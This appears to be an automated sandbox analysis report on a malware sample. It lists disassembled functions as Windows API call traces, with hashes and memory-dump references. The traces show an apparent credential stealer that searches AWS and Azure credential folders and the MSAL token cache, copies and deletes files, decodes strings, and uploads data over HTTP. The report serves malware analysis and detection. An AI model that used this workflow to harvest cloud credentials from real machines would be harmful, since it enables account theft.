                                        • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 022F9DA2
                                        • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 022F9DC4
                                        • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 022F9DE5
                                        • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 022F9E06
                                        • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 022F9E1D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID:
                                        • API String ID: 2238633743-0
                                        • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                        • Instruction ID: 47f074e770f5ec293270bee9bdab4cb5247edc57f0da5f447481bbcba2c624c4
                                        • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                        • Instruction Fuzzy Hash: 3BA13CBE5D0240BFE364EFE8ED88A963BFBF74E201714661AE605C3264D7399441DB12
                                        APIs
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                          • Part of subcall function 022F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022F9072
                                          • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                          • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                          • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                          • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 022FAC2C
                                          • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                          • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                          • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                          • Part of subcall function 022E9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022E9C53
                                          • Part of subcall function 022E9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022E9C78
                                          • Part of subcall function 022E9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022E9C98
                                          • Part of subcall function 022E9C27: ReadFile.KERNEL32(000000FF,?,00000000,022E16F6,00000000), ref: 022E9CC1
                                          • Part of subcall function 022E9C27: LocalFree.KERNEL32(022E16F6), ref: 022E9CF7
                                          • Part of subcall function 022E9C27: CloseHandle.KERNEL32(000000FF), ref: 022E9D01
                                          • Part of subcall function 022F9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022F90B9
                                        • strtok_s.MSVCRT ref: 022F0582
                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 022F05C9
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 022F05D0
                                        • StrStrA.SHLWAPI(00000000,00421618), ref: 022F05EC
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F05FA
                                          • Part of subcall function 022F8B47: malloc.MSVCRT ref: 022F8B4F
                                          • Part of subcall function 022F8B47: strncpy.MSVCRT ref: 022F8B6A
                                        • StrStrA.SHLWAPI(00000000,00421620), ref: 022F0636
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F0644
                                        • StrStrA.SHLWAPI(00000000,00421628), ref: 022F0680
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F068E
                                        • StrStrA.SHLWAPI(00000000,00421630), ref: 022F06CA
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F06DC
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F0769
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F0781
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F0799
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F07B1
                                        • lstrcat.KERNEL32(?,0042164C), ref: 022F07C9
                                        • lstrcat.KERNEL32(?,00421660), ref: 022F07D8
                                        • lstrcat.KERNEL32(?,00421670), ref: 022F07E7
                                        • lstrcat.KERNEL32(?,00000000), ref: 022F07FA
                                        • lstrcat.KERNEL32(?,00421678), ref: 022F0809
                                        • lstrcat.KERNEL32(?,00000000), ref: 022F081C
                                        • lstrcat.KERNEL32(?,0042167C), ref: 022F082B
                                        • lstrcat.KERNEL32(?,00421680), ref: 022F083A
                                        • lstrcat.KERNEL32(?,00000000), ref: 022F084D
                                        • lstrcat.KERNEL32(?,00421688), ref: 022F085C
                                        • lstrcat.KERNEL32(?,0042168C), ref: 022F086B
                                        • lstrcat.KERNEL32(?,00000000), ref: 022F087E
                                        • lstrcat.KERNEL32(?,00421698), ref: 022F088D
                                        • lstrcat.KERNEL32(?,0042169C), ref: 022F089C
                                        • strtok_s.MSVCRT ref: 022F08E0
                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F08F5
                                        • memset.MSVCRT ref: 022F0944
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                        • String ID:
                                        • API String ID: 3689735781-0
                                        • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                        • Instruction ID: 00932a0c0d6649626b2fe05d703a4d45960ce4dc3ccbb1e25a9b38d5e34dbdad
                                        • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                        • Instruction Fuzzy Hash: 67D15175A60308ABCB44FBE4DD55EEEB77AFF14700F504429E206A6198DF34AA09CF61
                                        APIs
                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                          • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                          • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                        • StrCmpCA.SHLWAPI(?,00861C98), ref: 00405A13
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                        • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00861C28,00000000,?,0085C388,00000000,?,00421A1C), ref: 00405E71
                                        • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                        • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                        • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                        • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                        • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                        • memcpy.MSVCRT(?), ref: 00405EFE
                                        • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                        • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                        • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                        • HttpOpenRequestA.WININET(00000000,00861B98,?,00861180,00000000,00000000,00400100,00000000), ref: 00405BF8
                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 1406981993-2180234286
                                        • Opcode ID: 3ebd56be930fdd33a3d10542083d32415db5d862f2eace212fb39ca077426745
                                        • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                        • Opcode Fuzzy Hash: 3ebd56be930fdd33a3d10542083d32415db5d862f2eace212fb39ca077426745
                                        • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                        APIs
                                        • memset.MSVCRT ref: 00414D87
                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                        • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                        • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                          • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                        • memset.MSVCRT ref: 00414E13
                                        • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                        • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                          • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                          • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                        • memset.MSVCRT ref: 00414E9F
                                        • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                        • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                          • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00861B48,?,000003E8), ref: 00414A4A
                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                          • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                          • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                        • memset.MSVCRT ref: 00414F2B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                        • API String ID: 4017274736-156832076
                                        • Opcode ID: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                        • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                        • Opcode Fuzzy Hash: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                        • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                        APIs
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                          • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 022FAC2C
                                          • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                          • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                          • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                          • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 022F8DED
                                          • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                          • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022ED1EA
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 022ED32E
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 022ED335
                                        • lstrcat.KERNEL32(?,00000000), ref: 022ED46F
                                        • lstrcat.KERNEL32(?,00421478), ref: 022ED47E
                                        • lstrcat.KERNEL32(?,00000000), ref: 022ED491
                                        • lstrcat.KERNEL32(?,0042147C), ref: 022ED4A0
                                        • lstrcat.KERNEL32(?,00000000), ref: 022ED4B3
                                        • lstrcat.KERNEL32(?,00421480), ref: 022ED4C2
                                        • lstrcat.KERNEL32(?,00000000), ref: 022ED4D5
                                        • lstrcat.KERNEL32(?,00421484), ref: 022ED4E4
                                        • lstrcat.KERNEL32(?,00000000), ref: 022ED4F7
                                        • lstrcat.KERNEL32(?,00421488), ref: 022ED506
                                        • lstrcat.KERNEL32(?,00000000), ref: 022ED519
                                        • lstrcat.KERNEL32(?,0042148C), ref: 022ED528
                                        • lstrcat.KERNEL32(?,00000000), ref: 022ED53B
                                        • lstrcat.KERNEL32(?,00421490), ref: 022ED54A
                                          • Part of subcall function 022FAA87: lstrlen.KERNEL32(022E516C,?,?,022E516C,00420DDE), ref: 022FAA92
                                          • Part of subcall function 022FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022FAAEC
                                        • lstrlen.KERNEL32(?), ref: 022ED591
                                        • lstrlen.KERNEL32(?), ref: 022ED5A0
                                        • memset.MSVCRT ref: 022ED5EF
                                          • Part of subcall function 022FACD7: StrCmpCA.SHLWAPI(0064A350,022EAA0E,?,022EAA0E,0064A350), ref: 022FACF6
                                        • DeleteFileA.KERNEL32(00000000), ref: 022ED61B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                        • String ID:
                                        • API String ID: 1973479514-0
                                        • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                        • Instruction ID: 41b4746c9ffd5306fe0af26f11e432d7f1e46ce2f38ded2814f4f51be4619bb3
                                        • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                        • Instruction Fuzzy Hash: 8FE15175960308ABCB44FBE4DD95DEEB37ABF24301F504169F20AA6194DF34AA09CF61
                                        APIs
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,0085BE78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                        • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                        • lstrcatA.KERNEL32(?,00000000,0085A0B8,00421474,0085A0B8,00421470,00000000), ref: 0040D208
                                        • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                        • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                        • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                        • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                        • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                        • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                        • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0085A0F8,?,0042110C,?,00000000), ref: 0041A82B
                                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                        • lstrlenA.KERNEL32(?), ref: 0040D32A
                                        • lstrlenA.KERNEL32(?), ref: 0040D339
                                        • memset.MSVCRT ref: 0040D388
                                          • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                        • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                        • String ID:
                                        • API String ID: 2775534915-0
                                        • Opcode ID: d24ddb9e76a6b74a6b2a38b11c122024a52b6330bafe3683b44fcab1fb2cbcc2
                                        • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                        • Opcode Fuzzy Hash: d24ddb9e76a6b74a6b2a38b11c122024a52b6330bafe3683b44fcab1fb2cbcc2
                                        • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                        APIs
                                          • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                          • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A51
                                          • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A68
                                          • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A7F
                                          • Part of subcall function 022E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022E4AA0
                                          • Part of subcall function 022E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022E4AB0
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 022E5C5F
                                        • StrCmpCA.SHLWAPI(?,0064A480), ref: 022E5C7A
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022E5DFA
                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 022E60D8
                                        • lstrlen.KERNEL32(00000000), ref: 022E60E9
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 022E60FA
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 022E6101
                                        • lstrlen.KERNEL32(00000000), ref: 022E6116
                                        • memcpy.MSVCRT(?,00000000,00000000), ref: 022E612D
                                        • lstrlen.KERNEL32(00000000), ref: 022E613F
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 022E6158
                                        • memcpy.MSVCRT(?), ref: 022E6165
                                        • lstrlen.KERNEL32(00000000,?,?), ref: 022E6182
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 022E6196
                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 022E61B3
                                        • InternetCloseHandle.WININET(00000000), ref: 022E6217
                                        • InternetCloseHandle.WININET(00000000), ref: 022E6224
                                        • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022E5E5F
                                          • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 022FAC2C
                                          • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                          • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                          • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                          • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                          • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                        • InternetCloseHandle.WININET(00000000), ref: 022E622E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                        • String ID:
                                        • API String ID: 1703137719-0
                                        • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                        • Instruction ID: 296a0ab31cd51e8f10a314ce8ebea061593ea8a90364c4d2e63d94af6b265ca4
                                        • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                        • Instruction Fuzzy Hash: 8212DD71970318ABCB55EBE4DD95EEEF37ABF24700F4041A9A20A62194DF742B89CF50
                                        APIs
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                          • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                          • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                          • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                          • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 022FAC2C
                                          • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                          • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 022ECCD3
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 022ECCF0
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 022ECCFC
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 022ECD0F
                                        • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 022ECD1C
                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 022ECD40
                                        • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 022ECD5E
                                        • StrStrA.SHLWAPI(00000000,0064A364), ref: 022ECD85
                                        • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 022ECF09
                                        • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 022ECF20
                                          • Part of subcall function 022ECA87: memset.MSVCRT ref: 022ECABA
                                          • Part of subcall function 022ECA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 022ECAD8
                                          • Part of subcall function 022ECA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 022ECAE3
                                          • Part of subcall function 022ECA87: memcpy.MSVCRT(?,?,?), ref: 022ECB79
                                        • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 022ECFC1
                                        • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 022ECFD8
                                          • Part of subcall function 022ECA87: lstrcat.KERNEL32(?,00420B46), ref: 022ECBAA
                                          • Part of subcall function 022ECA87: lstrcat.KERNEL32(?,00420B47), ref: 022ECBBE
                                          • Part of subcall function 022ECA87: lstrcat.KERNEL32(?,00420B4E), ref: 022ECBDF
                                        • lstrlen.KERNEL32(00000000), ref: 022ED0AB
                                        • CloseHandle.KERNEL32(00000000), ref: 022ED103
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
